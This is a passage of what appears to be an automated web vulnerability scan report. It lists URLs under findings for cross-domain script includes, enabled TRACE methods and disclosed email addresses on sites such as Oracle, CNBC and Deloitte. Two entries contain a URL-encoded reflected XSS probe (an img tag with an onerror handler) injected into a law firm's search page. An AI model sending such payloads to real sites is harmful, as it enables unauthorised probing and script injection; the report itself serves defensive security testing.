19.31. http://afe.specificclick.net/serve/v=5
19.32. http://blog.harbottle.com/dm/
19.33. http://blog.harbottle.com/dm/index.php
19.34. http://clickserve.dartsearch.net/link/click
19.35. http://d7.zedo.com/jsc/d3/fl.js
19.36. http://d7.zedo.com/jsc/d3/fl.js
19.37. http://d7.zedo.com/jsc/d3/fl.js
19.38. http://d7.zedo.com/jsc/d3/fl.js
19.39. http://d7.zedo.com/jsc/d3/fl.js
19.40. http://d7.zedo.com/jsc/d3/fl.js
19.41. http://d7.zedo.com/jsc/d3/fl.js
19.42. http://d7.zedo.com/jsc/d3/fl.js
19.43. http://d7.zedo.com/jsc/d3/fl.js
19.44. http://d7.zedo.com/jsc/d3/fl.js
19.45. http://d7.zedo.com/lar/v11-001/d7/jsc/flr.js
19.46. http://data.cnbc.com/quotes/CN
19.47. http://data.cnbc.com/quotes/CN
19.48. http://data.cnbc.com/quotes/HK
19.49. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage
19.50. http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main
19.51. http://fls.doubleclick.net/activityi
19.52. http://fls.doubleclick.net/activityi
19.53. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071435827/
19.54. http://netsuite-www.baynote.net/baynote/tags2/guide/results-products/netsuite-www
19.55. http://netsuite-www.baynote.net/baynote/tags2/guide/results-products/netsuite-www
19.56. http://optimized-by.rubiconproject.com/a/dk.html
19.57. https://oracleus.wingateweb.com/portal/newreg.ww
19.58. http://readwriteenterprise.disqus.com/combination_widget.js
19.59. http://search.cnbc.com/main.do
19.60. http://search.oracle.com/search/search
19.61. http://serve.directdigitalllc.com/serve.php
19.62. http://serve.directdigitalllc.com/serve.php
19.63. http://serve.directdigitalllc.com/serve.php
19.64. http://serve.directdigitalllc.com/serve.php
19.65. http://serve.directdigitalllc.com/serve.php
19.66. http://serve.directdigitalllc.com/serve.php
19.67. http://serve.directdigitalllc.com/serve.php
19.68. http://serve.directdigitalllc.com/serve.php
19.69. http://serve.directdigitalllc.com/serve.php
19.70. http://serve.directdigitalllc.com/serve.php
19.71. http://sophelle.web5.hubspot.com/Default.aspx
19.72. http://sophelle.web5.hubspot.com/Default.aspx
19.73. http://thinkwrap.com/wp-content/themes/vision/library/media/js/jquery.prettyPhoto.js
19.74. http://ticker.cnbc.com/scripts/cnbc_ticker.js
19.75. http://www.atg.com/service/main.jsp
19.76. https://www.atg.com/en/password/request/
19.77. https://www.atg.com/service/main.jsp
19.78. http://www.bigcommerce.com/lp/e1-lp-ecommerce.php
19.79. http://www.cnbc.com/js/cnbc_quote_components.js
19.80. http://www.covergirl.com/__utm.gif
19.81. http://www.covergirl.com/beauty-products
19.82. http://www.csc.com/search
19.83. http://www.cvs.com/CVSApp/promoContent/promoLandingTemplate.jsp
19.84. http://www.cvs.com/CVSApp/search/search.jsp
19.85. http://www.deloitte.com/view/en_US/us/search/index.htm
19.86. http://www.deloitte.com/view/en_US/us/search/index.htm
19.87. http://www.deloitte.com/view/en_US/us/search/index.htm
19.88. http://www.deloitte.com/view/en_US/us/search/index.htm
19.89. http://www.dove.us/Products/Hair/
19.90. http://www.facebook.com/plugins/activity.php
19.91. http://www.facebook.com/plugins/activity.php
19.92. http://www.fekkai.com/
19.93. http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp
19.94. http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp
19.95. http://www.gillettevenus.com/en_US/search/index.jsp
19.96. http://www.gillettevenus.com/global/blank.html
19.97. http://www.google.com/search
19.98. http://www.google.com/search
19.99. http://www.google.com/search
19.100. http://www.google.com/search
19.101. http://www.googleadservices.com/pagead/conversion/1071435827/
19.102. http://www.harbottle.com/hnl/pages/hnl.php
19.103. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf
19.104. http://www.marykay.com/default.aspx
19.105. http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html
19.106. http://www.oracle.com/openworld/register/packages/index.html
19.107. http://www.oracle.com/technetwork/index.html
19.108. http://www.oracle.com/us/ciocentral/index.html
19.109. http://www.oracle.com/us/go/index.html
19.110. http://www.oraclecfo.com/Authentication/Login_w.html
19.111. http://www.oraclecfo.com/Main/Solutions/Solutions_w.html
19.112. http://www.rayalab.com/
19.113. http://www.resourcepoint.net/
19.114. http://www.sapient.com/en-us/search.html
19.115. http://www.shopify.com/
19.116. http://www.tenzing.com/atg-ecommerce-hosting.asp
19.117. http://www.volusion.com/
19.118. http://www.youtube.com/embed/kPJh9FWuOks
19.119. http://www.znode.com/znode-multifront/default.aspx
20. Cross-domain script include
20.1. https://account.bigcommerce.com/cart.php
20.2. http://ad.doubleclick.net/adi/N763.SpecificMedia/B5646003.2
20.3. http://afe.specificclick.net/serve/v=5
20.4. http://afe.specificclick.net/serve/v=5
20.5. http://afe.specificclick.net/serve/v=5
20.6. http://blog.harbottle.com/dm/
20.7. http://blog.harbottle.com/dm/index.php
20.8. http://blog.ulf-wendel.de/
20.9. http://blogs.oracle.com/otn/resource/html/tweet2.html
20.10. http://cdn5.tribalfusion.com/media/1956006/frame.html
20.11. http://cdn5.tribalfusion.com/media/2516896//frm.html
20.12. https://cms.paypal.com/us/cgi-bin/
20.13. http://data.cnbc.com/quotes
20.14. http://data.cnbc.com/quotes/
20.15. http://data.cnbc.com/quotes/.DJIA
20.16. http://data.cnbc.com/quotes/.DJIA
20.17. http://data.cnbc.com/quotes/.DJIA/tab/1
20.18. http://data.cnbc.com/quotes/.DJIA/tab/2
20.19. http://data.cnbc.com/quotes/.FCHI
20.20. http://data.cnbc.com/quotes/.FCHI/tab/2
20.21. http://data.cnbc.com/quotes/.FTSE
20.22. http://data.cnbc.com/quotes/.FTSE/tab/2
20.23. http://data.cnbc.com/quotes/.GDAXI
20.24. http://data.cnbc.com/quotes/.GDAXI/tab/2
20.25. http://data.cnbc.com/quotes/.N225
20.26. http://data.cnbc.com/quotes/.N225/tab/2
20.27. http://data.cnbc.com/quotes/.SPX
20.28. http://data.cnbc.com/quotes/.SPX/tab/2
20.29. http://data.cnbc.com/quotes/CN
20.30. http://data.cnbc.com/quotes/CN
20.31. http://data.cnbc.com/quotes/COMP
20.32. http://data.cnbc.com/quotes/COMP/tab/2
20.33. http://data.cnbc.com/quotes/HK
20.34. https://deloitte.zettaneer.com/Subscriptions/
20.35. http://digg.com/submit
20.36. http://ecommerce-templates.volusion.com/
20.37. http://edge.sapient.com/assets/scripts/global.js
20.38. http://fls.doubleclick.net/activityi
20.39. https://login.cnbc.com/cas/login
20.40. http://oasc12059.247realmedia.com/RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1
20.41. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
20.42. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
20.43. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
20.44. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
20.45. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
20.46. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
20.47. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
20.48. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
20.49. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
20.50. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
20.51. https://register.cnbc.com/email/EmailSupport.jsp
20.52. https://register.cnbc.com/forgotPassword.do
20.53. https://register.cnbc.com/forgotPassword1.do
20.54. http://search.cnbc.com/main.do
20.55. http://support.bigcommerce.com/
20.56. https://support.bigcommerce.com/questions/1127/How+do+I+Setup+SocialShop+%28v2%29+Application+in+Facebook%3F
20.57. http://thinkwrap.com/contact/
20.58. http://thinkwrap.com/ourfocus/atg-ecommerce-solutions-partner/
20.59. http://thinkwrap.com/ourfocus/location-services/
20.60. http://thinkwrap.com/wp-content/uploads/2010/07/bg-header-nav-men.png
20.61. http://thinkwrap.com/wp-content/uploads/2010/07/bg-header-su-menu.gif
20.62. http://www.atg.com/
20.63. http://www.atg.com/en/solutions/
20.64. http://www.atg.com/service/main.jsp
20.65. https://www.atg.com/en/customers/listing/
20.66. https://www.atg.com/en/password/request/
20.67. https://www.atg.com/en/register/
20.68. https://www.atg.com/service/main.jsp
20.69. http://www.beautyproductsdirect.com/
20.70. http://www.beautyproductsdirect.com/lashes.html
20.71. http://www.bigcommerce.com/
20.72. http://www.bigcommerce.com/in-the-news.php
20.73. http://www.bigcommerce.com/lp/e1-lp-ecommerce.php
20.74. http://www.bigcommerce.com/plans.php
20.75. https://www.bigcommerce.com/buzz.php
20.76. https://www.bigcommerce.com/careers.php
20.77. https://www.bigcommerce.com/compatible-with.php
20.78. https://www.bigcommerce.com/login.php
20.79. https://www.bigcommerce.com/pci-compliant-shopping-cart-software.php
20.80. http://www.cnbc.com/
20.81. http://www.cnbc.com/id/15837856
20.82. http://www.cnbc.com/id/15837856/site/14081545/
20.83. http://www.cnbc.com/id/15838394
20.84. http://www.cnbc.com/id/15839263/
20.85. http://www.cnbc.com/pointrollads.htm
20.86. http://www.covergirl.com/__utm.gif
20.87. http://www.covergirl.com/beauty-products
20.88. http://www.covergirl.com/favicon.ico
20.89. http://www.covergirl.com/search/results=makeup%20eyelash
20.90. http://www.covergirl.com/search/results=xss%20help%20phone%20cable
20.91. http://www.csc.com/application_services/contact_us
20.92. http://www.csc.com/contact_us
20.93. http://www.csc.com/credit_services/contact_us/
20.94. http://www.csc.com/cybersecurity/contact_us
20.95. http://www.deloitte.com/view/en_US/us/Contact-us/email-us/index.htm
20.96. http://www.deloitte.com/view/en_US/us/Contact-us/index.htm
20.97. http://www.deloitte.com/view/en_US/us/Industries/Telecom-Telecommunications-Technology/a1a6da8d60fd4210VgnVCM200000bb42f00aRCRD.htm
20.98. http://www.deloitte.com/view/en_US/us/Industries/index.htm
20.99. http://www.deloitte.com/view/en_US/us/Insights/index.htm
20.100. http://www.deloitte.com/view/en_US/us/Services/additional-services/talent-human-capital-hr/Talent-Library/558d34d8a3a2f210VgnVCM3000001c56f00aRCRD.htm
20.101. http://www.deloitte.com/view/en_US/us/index.htm
20.102. http://www.deloitte.com/view/en_US/us/search/index.htm
20.103. http://www.dove.us/Products/Hair/
20.104. http://www.facebook.com/plugins/activity.php
20.105. http://www.fekkai.com/
20.106. http://www.fekkai.com/categories/conditioners/
20.107. http://www.fekkai.com/favicon.ico
20.108. http://www.fekkai.com/images/world_of_fekkai_box.jpg
20.109. http://www.fekkai.com/style/
20.110. http://www.fekkai.com/style/inspiration/
20.111. http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp
20.112. http://www.gillettevenus.com/en_US/goddess_central/styles/fancybox/jquery.fancybox-1.3.4.js
20.113. http://www.gillettevenus.com/en_US/images/go_roll.png
20.114. http://www.gillettevenus.com/en_US/products/refillables/embrace/index.jsp
20.115. http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp
20.116. http://www.gillettevenus.com/en_US/razor_finder/index.jsp
20.117. http://www.gillettevenus.com/en_US/search/index.jsp
20.118. http://www.gillettevenus.com/global/blank.html
20.119. http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php
20.120. http://www.harbottle.com/hnl/pages/articles/direct_beauty_products_trimsole.php
20.121. http://www.harbottle.com/hnl/pages/hnl.php
20.122. http://www.harbottle.com/hnl/pages/hnl_search2.php
20.123. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf
20.124. http://www.harbottle.com/hnl/pages/hnl_search2.php/a
20.125. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg
20.126. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif
20.127. http://www.harbottle.com/hnl/pages/pubs/479
20.128. http://www.harbottle.com/hnl/pix/newsletters/50th_logo.jpg
20.129. http://www.harbottle.com/hnl/pix/newsletters/ESportsMasthead.jpg
20.130. http://www.harbottle.com/hnl/pix/newsletters/gronholm_NSLTR.jpg
20.131. http://www.harbottle.com/hnl/pix/newsletters/rugby3.jpg
20.132. http://www.harbottle.com/hnl/pix/newsletters/sjones.jpg
20.133. http://www.harbottle.com/hnl/pix/square.gif
20.134. http://www.harbottle.com/hnl/pix/square_FF9933.gif
20.135. http://www.netsuite.com/portal/home.shtml
20.136. http://www.netsuite.com/portal/products/netsuite/financials/main.shtml
20.137. http://www.netsuite.com/portal/products/netsuite/revenue/main.shtml
20.138. http://www.oracle.com/ao/index.html
20.139. http://www.oracle.com/as/corporate/contact/bangladesh-316183-en-as.html
20.140. http://www.oracle.com/as/corporate/contact/bhutan-316187-en-as.html
20.141. http://www.oracle.com/as/corporate/contact/brunei-316198-en-as.html
20.142. http://www.oracle.com/as/corporate/contact/cambodia-316193-en-as.html
20.143. http://www.oracle.com/as/corporate/contact/laos-316260-en-as.html
20.144. http://www.oracle.com/as/corporate/contact/maldives-316209-en-as.html
20.145. http://www.oracle.com/as/corporate/contact/nepal-316215-en-as.html
20.146. http://www.oracle.com/as/corporate/contact/pakistan-316185-en-as.html
20.147. http://www.oracle.com/index.html
20.148. http://www.oracle.com/openworld/connect/face-to-face/welcome-reception/index.html
20.149. http://www.oracle.com/openworld/connect/index.html
20.150. http://www.oracle.com/openworld/contact/index.html
20.151. http://www.oracle.com/openworld/index.html
20.152. http://www.oracle.com/openworld/learn/index.html
20.153. http://www.oracle.com/openworld/learn/other/general-sessions/index.html
20.154. http://www.oracle.com/openworld/learn/other/oracle-university/index.html
20.155. http://www.oracle.com/openworld/register/packages/index.html
20.156. http://www.oracle.com/openworld/tools/index.html
20.157. http://www.oracle.com/openworld/tools/mobile/index.html
20.158. http://www.oracle.com/partners/admin/web_account.html
20.159. http://www.oracle.com/partners/en/how-to-do-business/index.html
20.160. http://www.oracle.com/partners/en/join-now/index.html
20.161. http://www.oracle.com/partners/en/knowledge-zone/index.html
20.162. http://www.oracle.com/partners/en/most-popular-resources/enablement-028916.htm
20.163. http://www.oracle.com/partners/en/opn-program/index.html
20.164. http://www.oracle.com/partners/en/opn-program/membership-resources/business-center/index.html
20.165. http://www.oracle.com/partners/en/opn-program/membership-resources/index.html
20.166. http://www.oracle.com/partners/en/opn-program/opn-details-by-levels/index.html
20.167. http://www.oracle.com/partners/en/opn-program/specialize/index.html
20.168. http://www.oracle.com/partners/index.html
20.169. http://www.oracle.com/partners/secure/development/index.html
20.170. http://www.oracle.com/partners/secure/development/order-technology-software/access-software-and-support-020672.htm
20.171. http://www.oracle.com/partners/secure/development/order-technology-software/index.html
20.172. http://www.oracle.com/partners/secure/marketing/download-logos/index.html
20.173. http://www.oracle.com/partners/secure/marketing/index.html
20.174. http://www.oracle.com/partners/secure/marketing/marketing-and-event-kits/index.html
20.175. http://www.oracle.com/partners/secure/membership/index.html
20.176. http://www.oracle.com/partners/secure/news/index.html
20.177. http://www.oracle.com/partners/secure/news/worldwide-opn-newsletter/index.html
20.178. http://www.oracle.com/partners/secure/sales/index.html
20.179. http://www.oracle.com/partners/secure/sales/partner-ordering-portal/partner-ordering-portal-020782.htm
20.180. http://www.oracle.com/partners/secure/sales/pricing-licensing/index.html
20.181. http://www.oracle.com/partners/secure/sales/resell-support/index.html
20.182. http://www.oracle.com/partners/secure/sales/sales-kits/index.html
20.183. http://www.oracle.com/partners/secure/support/index.html
20.184. http://www.oracle.com/technetwork/apps-tech/index-095827.html
20.185. http://www.oracle.com/technetwork/apps-tech/index-097651.html
20.186. http://www.oracle.com/technetwork/apps-tech/index.html
20.187. http://www.oracle.com/technetwork/architect/index.html
20.188. http://www.oracle.com/technetwork/articles/index.html
20.189. http://www.oracle.com/technetwork/community/developer-vm/index.html
20.190. http://www.oracle.com/technetwork/community/join/overview/index.html
20.191. http://www.oracle.com/technetwork/community/oracle-ace/index.html
20.192. http://www.oracle.com/technetwork/database/berkeleydb/downloads/index.html
20.193. http://www.oracle.com/technetwork/database/enterprise-edition/documentation/index.html
20.194. http://www.oracle.com/technetwork/database/enterprise-edition/downloads/index.html
20.195. http://www.oracle.com/technetwork/database/enterprise-edition/overview/index.html
20.196. http://www.oracle.com/technetwork/database/express-edition/downloads/index.html
20.197. http://www.oracle.com/technetwork/database/features/instant-client/index-097480.html
20.198. http://www.oracle.com/technetwork/database/windows/downloads/index-101290.html
20.199. http://www.oracle.com/technetwork/dbadev/index.html
20.200. http://www.oracle.com/technetwork/developer-tools/apex/downloads/index.html
20.201. http://www.oracle.com/technetwork/developer-tools/eclipse/downloads/index.html
20.202. http://www.oracle.com/technetwork/developer-tools/index.html
20.203. http://www.oracle.com/technetwork/developer-tools/jdev/downloads/index.html
20.204. http://www.oracle.com/technetwork/developer-tools/sql-developer/downloads/index.html
20.205. http://www.oracle.com/technetwork/index.html
20.206. http://www.oracle.com/technetwork/indexes/documentation/index.html
20.207. http://www.oracle.com/technetwork/indexes/downloads/index.html
20.208. http://www.oracle.com/technetwork/indexes/products/index.html
20.209. http://www.oracle.com/technetwork/java/index.html
20.210. http://www.oracle.com/technetwork/middleware/fusion-middleware/documentation/index.html
20.211. http://www.oracle.com/technetwork/middleware/fusion-middleware/downloads/index.html
20.212. http://www.oracle.com/technetwork/middleware/fusion-middleware/overview/index.html
20.213. http://www.oracle.com/technetwork/middleware/jrockit/downloads/index.html
20.214. http://www.oracle.com/technetwork/middleware/soasuite/downloads/index.html
20.215. http://www.oracle.com/technetwork/oem/downloads/index-084446.html
20.216. http://www.oracle.com/technetwork/oem/grid-control/documentation/index.html
20.217. http://www.oracle.com/technetwork/oem/grid-control/downloads/index.html
20.218. http://www.oracle.com/technetwork/oem/grid-control/overview/index.html
20.219. http://www.oracle.com/technetwork/oramag/magazine/home/index.html
20.220. http://www.oracle.com/technetwork/server-storage/solaris/downloads/index.html
20.221. http://www.oracle.com/technetwork/systems/index.html
20.222. http://www.oracle.com/technetwork/topics/cloud/index.html
20.223. http://www.oracle.com/technetwork/topics/index.html
20.224. http://www.oracle.com/technetwork/topics/newtojava/index.html
20.225. http://www.oracle.com/technetwork/topics/newtojava/overview/index.html
20.226. http://www.oracle.com/technetwork/topics/security/index.html
20.227. http://www.oracle.com/technetwork/topics/soa/index.html
20.228. http://www.oracle.com/technetwork/topics/virtualization/index.html
20.229. http://www.oracle.com/us/ciocentral/index.html
20.230. http://www.oracle.com/us/community/index.html
20.231. http://www.oracle.com/us/corporate/Acquisitions/index.html
20.232. http://www.oracle.com/us/corporate/analystrelations/index.html
20.233. http://www.oracle.com/us/corporate/blogs/index.html
20.234. http://www.oracle.com/us/corporate/careers/index.html
20.235. http://www.oracle.com/us/corporate/citizenship/community/038108.htm
20.236. http://www.oracle.com/us/corporate/citizenship/index.html
20.237. http://www.oracle.com/us/corporate/customers/index.html
20.238. http://www.oracle.com/us/corporate/customers/oracle-users-groups-192206.html
20.239. http://www.oracle.com/us/corporate/features/engineered-173370.html
20.240. http://www.oracle.com/us/corporate/history/index.html
20.241. http://www.oracle.com/us/corporate/index.html
20.242. http://www.oracle.com/us/corporate/innovation/index.html
20.243. http://www.oracle.com/us/corporate/insight/index.html
20.244. http://www.oracle.com/us/corporate/investor-relations/corporate-governance-176724.html
20.245. http://www.oracle.com/us/corporate/investor-relations/index.html
20.246. http://www.oracle.com/us/corporate/oracle-racing-070515.html
20.247. http://www.oracle.com/us/corporate/press/BoardofDirectors/index.html
20.248. http://www.oracle.com/us/corporate/press/Executives/index.html
20.249. http://www.oracle.com/us/corporate/press/index.html
20.250. http://www.oracle.com/us/corporate/pricing/index.html
20.251. http://www.oracle.com/us/corporate/pricing/price-lists/index.html
20.252. http://www.oracle.com/us/corporate/profit/index.html
20.253. http://www.oracle.com/us/corporate/publishing/index.html
20.254. http://www.oracle.com/us/corporate/timeline/index.html
20.255. http://www.oracle.com/us/go/index.html
20.256. http://www.oracle.com/us/index.html
20.257. http://www.oracle.com/us/industries/communications/index.html
20.258. http://www.oracle.com/us/industries/education-and-research/018753.htm
20.259. http://www.oracle.com/us/industries/engineering-and-construction/index.html
20.260. http://www.oracle.com/us/industries/financial-services/index.html
20.261. http://www.oracle.com/us/industries/index.html
20.262. http://www.oracle.com/us/industries/retail/index.html
20.263. http://www.oracle.com/us/partnerships/solutions/index.html
20.264. http://www.oracle.com/us/partnerships/specialized-showcase-224514.html
20.265. http://www.oracle.com/us/products/applications/fusion/index.html
20.266. http://www.oracle.com/us/products/applications/index.html
20.267. http://www.oracle.com/us/products/applications/jd-edwards-enterpriseone/index.html
20.268. http://www.oracle.com/us/products/applications/peoplesoft-enterprise/index.html
20.269. http://www.oracle.com/us/products/applications/primavera/index.html
20.270. http://www.oracle.com/us/products/consulting/index.html
20.271. http://www.oracle.com/us/products/database/index.html
20.272. http://www.oracle.com/us/products/enterprise-manager/index.html
20.273. http://www.oracle.com/us/products/financing/index.html
20.274. http://www.oracle.com/us/products/index.html
20.275. http://www.oracle.com/us/products/middleware/exalogic/index.html
20.276. http://www.oracle.com/us/products/middleware/index.html
20.277. http://www.oracle.com/us/products/ondemand/index.html
20.278. http://www.oracle.com/us/products/productslist/index.html
20.279. http://www.oracle.com/us/products/servers-storage/index.html
20.280. http://www.oracle.com/us/products/servers-storage/solaris/index.html
20.281. http://www.oracle.com/us/products/tools/index.html
20.282. http://www.oracle.com/us/social-media/facebook/index.html
20.283. http://www.oracle.com/us/social-media/linkedin/index.html
20.284. http://www.oracle.com/us/social-media/twitter/index.html
20.285. http://www.oracle.com/us/solutions/corporate-governance/index.html
20.286. http://www.oracle.com/us/solutions/datawarehousing/index.html
20.287. http://www.oracle.com/us/solutions/ent-performance-bi/index.html
20.288. http://www.oracle.com/us/solutions/midsize/index.html
20.289. http://www.oracle.com/us/solutions/performance-scalability/index.html
20.290. http://www.oracle.com/us/solutions/solutions-165852.html
20.291. http://www.oracle.com/us/sun/index.html
20.292. http://www.oracle.com/us/support/advanced-customer-services/index.html
20.293. http://www.oracle.com/us/support/contact-068555.html
20.294. http://www.oracle.com/us/support/development-tools-080025.html
20.295. http://www.oracle.com/us/support/index.html
20.296. http://www.oracle.com/us/support/lifetime-support/index.html
20.297. http://www.oracle.com/us/support/oracle-support-services-359636.html
20.298. http://www.oracle.com/us/support/policies/index.html
20.299. http://www.oracle.com/us/support/premier/index.html
20.300. http://www.oracle.com/us/support/support-integration/index.html
20.301. http://www.oracle.com/us/syndication/subscribe/index.html
20.302. http://www.oracle.com/us/technologies/cloud/index.html
20.303. http://www.oracle.com/us/technologies/java/index.html
20.304. http://www.oracle.com/us/technologies/virtualization/index.html
20.305. http://www.oracleimg.com/us/assets/metrics/crossdomain.xml
20.306. http://www.rayalab.com/
20.307. http://www.rayalab.com/free_sample.html
20.308. http://www.readwriteweb.com/%22http://rww.readwriteweb.netdna-cdn.com/assets_c/2009/06/oralogo_june09-thumb-150x20-5948.gif/%22
20.309. http://www.readwriteweb.com/404.html
20.310. http://www.readwriteweb.com/enterprise/2010/11/oracle.php
20.311. http://www.resourcepoint.net/
20.312. http://www.resourcepoint.net/index.htm
20.313. http://www.sapient.com/en-us/about-sapient/alliances.html
20.314. http://www.sapient.com/en-us/about-sapient/alliances/atg.html
20.315. http://www.sapient.com/en-us/about-sapient/corporate-social-responsibility.html
20.316. http://www.sapient.com/en-us/search.html
20.317. http://www.shopify.com/
20.318. http://www.shopify.com/admin/auth/login
20.319. http://www.shopify.com/examples
20.320. http://www.shopify.com/login
20.321. http://www.shopify.com/tour
20.322. http://www.sophelle.com/Success-Stories/Automated-Website-Testing.html
20.323. http://www.tenzing.com/atg-ecommerce-hosting.asp
20.324. http://www.tenzing.com/cloud/cloud-pricing.asp
20.325. http://www.tenzing.com/cloud/sign-up-now.asp
20.326. http://www.tenzing.com/hosting-solutions.asp
20.327. http://www.tenzing.com/sitemap.asp
20.328. http://www.volusion.com/
20.329. http://www.volusion.com/a1/f/OpenSans-Regular-webfont.woff
20.330. http://www.volusion.com/a1/f/OpenSans-Semibold-webfont.woff
20.331. http://www.youtube.com/embed/kPJh9FWuOks
20.332. http://www.youtube.com/embed/oxqAPZmFSUU
20.333. http://www.znode.com/znode-multifront/architecture.aspx
20.334. http://www.znode.com/znode-multifront/default.aspx
20.335. http://www.znode.com/znode-multifront/feature.aspx
21. TRACE method is enabled
21.1. http://1215.ic-live.com/
21.2. http://ads1.msn.com/
21.3. http://afe.specificclick.net/
21.4. http://c.statcounter.com/
21.5. http://cache.specificmedia.com/
21.6. http://channelsun.sun.com/
21.7. http://clk.fetchback.com/
21.8. http://convctr.overture.com/
21.9. http://d.ads.readwriteweb.com/
21.10. http://d1.openx.org/
21.11. http://deloitte.12hna.com/
21.12. http://dev.mysql.com/
21.13. http://digg.com/
21.14. https://dne.oracle.com/
21.15. http://dynpages-mktas.oracle.com/
21.16. http://education.oracle.com/
21.17. https://education.oracle.com/
21.18. http://fido.fetchback.com/
21.19. http://imp.fetchback.com/
21.20. http://legolas.nexac.com/
21.21. http://msnbcmedia.msn.com/
21.22. http://optimized-by.rubiconproject.com/
21.23. http://ping.crowdscience.com/
21.24. http://pixel.everesttech.net/
21.25. http://pixel.fetchback.com/
21.26. http://r.openx.net/
21.27. http://rt.legolas-media.com/
21.28. http://serve.directdigitalllc.com/
21.29. http://tap.rubiconproject.com/
21.30. http://tracker.wordstream.com/
21.31. http://tracking.hubspot.com/
21.32. http://www.beautyproductsdirect.com/
21.33. http://www.fekkai.com/
21.34. http://www.fetchback.com/
21.35. http://www.gillettevenus.com/
21.36. http://www.readwriteweb.com/
22. Email addresses disclosed
22.1. http://ads1.msn.com/library/dap.js
22.2. http://assets1.csc.com/es/downloads/7380_2.pdf
22.3. http://assets1.csc.com/lef/downloads/LEF_Briefing_TestingCoE_052809.pdf
22.4. http://blog.ulf-wendel.de/
22.5. http://blogs.oracle.com/otn/
22.6. http://blogs.oracle.com/otn/feed/entries/atom
22.7. http://blogs.oracle.com/otn/feed/entries/rss
22.8. https://dne.oracle.com/pls/uns/OPT_OUT.th
22.9. http://edge.sapient.com/assets/scripts/global.js
22.10. http://education.oracle.com/admin/jscripts/rd_temp_config/1001US_rd_temp_config.js
22.11. http://education.oracle.com/education/jscripts/JSSerializer.js
22.12. http://education.oracle.com/education/jscripts/OUheaderCSS.js
22.13. http://education.oracle.com/education/jscripts/s_code.js
22.14. https://education.oracle.com/admin/jscripts/rd_temp_config/_rd_temp_config.js
22.15. https://education.oracle.com/education/jscripts/OUheaderCSS.js
22.16. https://education.oracle.com/education/jscripts/s_code.js
22.17. http://event.on24.com/r.htm
22.18. https://forms.netsuite.com/app/site/crm/externalleadpage.nl
22.19. https://forums.oracle.com/forums/themes/english/resources/s_code.js
22.20. https://login.cnbc.com/cas/js/cnbc_login.js
22.21. https://myprofile.oracle.com/EndUser/jscripts/s_code.js
22.22. https://oracleus.wingateweb.com/portal/newreg.ww
22.23. https://register.cnbc.com/forgotPassword1.do
22.24. http://search.oracle.com/search/searchui/s_code.js
22.25. https://shop.oracle.com/pls/ostore/f
22.26. https://support.bigcommerce.com/javascript/livesearch.js
22.27. http://thinkwrap.com/wp-content/themes/vision/library/media/js/jquery.innerfade.js
22.28. http://twitter.com/favorites/shopify.json
22.29. http://webzoomers.com/
22.30. https://www.atg.com/en/password/request/
22.31. https://www.atg.com/javascript/form.js
22.32. http://www.beautyproductsdirect.com/
22.33. http://www.beautyproductsdirect.com/inc/js/jquery.innerfade.js
22.34. http://www.beautyproductsdirect.com/lashes.html
